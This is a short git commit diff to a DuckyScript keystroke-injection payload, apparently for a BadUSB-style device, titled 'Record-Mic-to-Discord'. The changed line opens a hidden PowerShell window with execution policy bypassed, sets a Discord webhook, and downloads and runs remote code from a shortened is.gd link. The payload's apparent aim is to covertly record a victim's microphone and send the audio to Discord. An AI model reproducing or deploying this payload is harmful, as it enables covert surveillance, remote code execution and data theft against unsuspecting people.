Update Record-Mic-to-Discord.txt

This commit is contained in:
egieb
2024-04-11 21:37:13 +00:00
committed by GitHub
parent 2b90fda5dc
commit 5cf3d796dd

View File

@@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm URL | iex
STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwmictodc | iex
ENTER